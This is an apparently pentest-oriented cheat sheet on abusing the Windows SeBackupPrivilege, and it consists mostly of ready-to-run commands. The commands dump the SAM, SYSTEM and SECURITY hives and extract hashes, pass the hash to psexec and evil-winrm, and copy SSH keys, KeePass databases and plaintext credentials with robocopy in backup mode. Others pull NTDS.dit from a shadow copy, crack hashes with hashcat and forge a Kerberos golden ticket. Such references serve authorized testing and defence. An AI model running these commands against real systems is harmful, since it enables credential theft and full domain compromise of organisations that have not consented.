Overview
SeBackupPrivilege lets a process read any file regardless of its DACL (backup semantics bypass the access check). Everything becomes readable: SAM/SYSTEM/SECURITY hives, NTDS.dit, SSH keys, KeePass DBs.
Default on BUILTIN\Administrators and BUILTIN\Backup Operators. On a DC, Backup Operators is domain-level → any member can dump the whole AD database.
Check If Enabled
whoami /priv | findstr /i "SeBackupPrivilege"
SeBackupPrivilege Back up files and directories Enabled
Shows Disabled? Still usable — the privilege only needs to be present in the token; enable it at runtime (Set-SeBackupPrivilege or AdjustTokenPrivileges).
Dump SAM & SYSTEM (Local Hashes)
reg save HKLM\SAM C:\Temp\SAM
reg save HKLM\SYSTEM C:\Temp\SYSTEM
reg save HKLM\SECURITY C:\Temp\SECURITY
impacket-smbserver share . -smb2support
impacket-secretsdump -sam SAM -system SYSTEM -security SECURITY LOCAL
# or
pypykatz registry SYSTEM --sam SAM --security SECURITY
impacket-psexec Administrator@TARGET -hashes aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0
evil-winrm -i TARGET -u Administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0
Read Any File — robocopy /B
/B = backup mode, ignores ACLs.
robocopy /B C:\Users\Administrator\Desktop C:\Temp report.txt
robocopy /B /E C:\Users\Administrator\ C:\Temp\admin_home\
# SSH keys
robocopy /B C:\Users\Administrator\.ssh C:\Temp id_rsa
# KeePass
robocopy /B C:\Users\Administrator\Documents C:\Temp *.kdbx
# PowerShell history
robocopy /B C:\Users\Administrator\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine C:\Temp ConsoleHost_history.txt
# Unattend/Sysprep (plaintext creds)
robocopy /B C:\Windows\Panther C:\Temp unattend.xml
# IIS config (connection strings)
robocopy /B C:\Windows\System32\inetsrv\config C:\Temp applicationHost.config
Read via PowerShell (Backup Semantics)
When robocopy is unavailable. DLLs: SeBackupPrivilege.
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll
Set-SeBackupPrivilege
Copy-FileSeBackupPrivilege "C:\Users\Administrator\Desktop\secret.txt" C:\Temp\secret.txt
Dump NTDS.dit (Domain Controller)
NTDS.dit is locked by AD — copy it from a Volume Shadow Copy.
1. diskshadow script
@"
set context persistent nowriters
add volume C: alias myvolume
create
expose %myvolume% Z:
"@ | Set-Content C:\Temp\shadow.txt
2. Run + copy + clean up
diskshadow /s C:\Temp\shadow.txt
robocopy /B Z:\Windows\NTDS C:\Temp ntds.dit
reg save HKLM\SYSTEM C:\Temp\SYSTEM
echo delete shadows volume C: > C:\Temp\cleanup.txt
echo reset >> C:\Temp\cleanup.txt
diskshadow /s C:\Temp\cleanup.txt
diskshadow.exe only ships on Windows Server, not 10/11. Run it from C:\Windows\System32 if you hit errors.
Alternative — wbadmin
If diskshadow is blocked (needs Windows Server Backup feature):
wbadmin start backup -backuptarget:C:\Temp -include:C:\Windows\NTDS\ntds.dit -quiet
impacket-secretsdump -ntds ntds.dit -system SYSTEM LOCAL -outputfile dump
hashcat -m 1000 dump.ntds /usr/share/wordlists/rockyou.txt
# Golden Ticket from krbtgt hash
impacket-ticketer -domain DOMAIN.LOCAL -domain-sid S-1-5-21-... -nthash <krbtgt_hash> -groups 512 Administrator
Combine with SeRestorePrivilege
Backup Operators usually hold both → read AND write any file. With write access (overwrite utilman.exe, service binaries, DLL hijack) you get SYSTEM. See SeRestorePrivilege.
Quick Reference
| Technique | Requirements | Impact |
|---|
reg save SAM/SYSTEM | SeBackup | Local admin hashes |
robocopy /B | SeBackup | Read any file |
| PowerShell backup semantics | SeBackup + DLLs | Read any file |
| diskshadow + robocopy NTDS.dit | SeBackup + DC | All domain hashes |
wbadmin NTDS.dit | SeBackup + DC + feature | All domain hashes |
| Overwrite utilman / DLL hijack | SeBackup + SeRestore | SYSTEM shell |